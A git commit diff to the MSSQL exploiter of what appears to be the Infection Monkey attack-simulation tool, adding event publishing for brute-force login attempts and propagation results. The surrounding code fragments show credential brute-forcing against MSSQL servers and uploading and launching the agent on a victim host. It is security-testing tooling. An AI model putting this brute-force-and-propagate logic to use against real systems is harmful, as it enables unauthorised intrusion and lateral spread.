Agent: Publish events from MSSQLExploiter

2022-10-04 14:46:35 +00:00 · 2022-10-04 14:46:35 +00:00 · 8dd196122b
parent e2453e481c
commit 8dd196122b
1 changed files with 16 additions and 7 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -1,7 +1,7 @@
 import logging
 from pathlib import PureWindowsPath
 from time import sleep
-from typing import Sequence, Tuple
+from typing import Iterable, Tuple

 import pymssql

@ -42,7 +42,7 @@ class MSSQLExploiter(HostExploiter):
        self.agent_http_path = None

    def _exploit_host(self) -> ExploiterResultData:
-        agent_path_on_victim = get_agent_dst_path(self.host)
+        agent_path_on_victim = PureWindowsPath(get_agent_dst_path(self.host))

        # Brute force to get connection
        creds = generate_identity_secret_pairs(
@ -72,15 +72,17 @@ class MSSQLExploiter(HostExploiter):
            )

            logger.error(error_message)
+            self.publish_propagation_event(self.host.ip_addr, False, error_message=error_message)
            self.exploit_result.error_message = error_message

            return self.exploit_result

+        self.publish_propagation_event(self.host.ip_addr, True)
        self.exploit_result.propagation_success = True
        return self.exploit_result

    def _brute_force(
-        self, host: str, port: str, users_passwords_pairs_list: Sequence[Tuple[str, str]]
+        self, host: str, port: str, users_passwords_pairs_list: Iterable[Tuple[str, str]]
    ) -> pymssql.Cursor:
        """
        Starts the brute force connection attempts and if needed then init the payload process.
@ -122,12 +124,13 @@ class MSSQLExploiter(HostExploiter):
                )
                self.exploit_result.exploitation_success = True
                self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
-                self.report_login_attempt(True, user, password)
+                self._report_login_attempt(True, host, user, password)
                cursor = conn.cursor()
                return cursor
            except pymssql.OperationalError as err:
-                logger.info(f"Connection to MSSQL failed: {err}")
-                self.report_login_attempt(False, user, password)
+                error_message = f"Connection to MSSQL failed: {err}"
+                logger.info(error_message)
+                self._report_login_attempt(False, host, user, password, error_message)
                # Combo didn't work, hopping to the next one
                pass

@ -139,6 +142,12 @@ class MSSQLExploiter(HostExploiter):
            "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
        )

+    def _report_login_attempt(
+        self, success: bool, host: str, user, password: str, message: str = ""
+    ):
+        self.publish_exploitation_event(host, success, error_message=message)
+        self.report_login_attempt(success, user, password)
+
    def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
        http_thread = self._start_agent_server(agent_path_on_victim)

@ -179,7 +188,7 @@ class MSSQLExploiter(HostExploiter):

    def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
        agent_args = build_monkey_commandline(
-            self.servers, self.current_depth + 1, agent_path_on_victim
+            self.servers, self.current_depth + 1, str(agent_path_on_victim)
        )

        return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"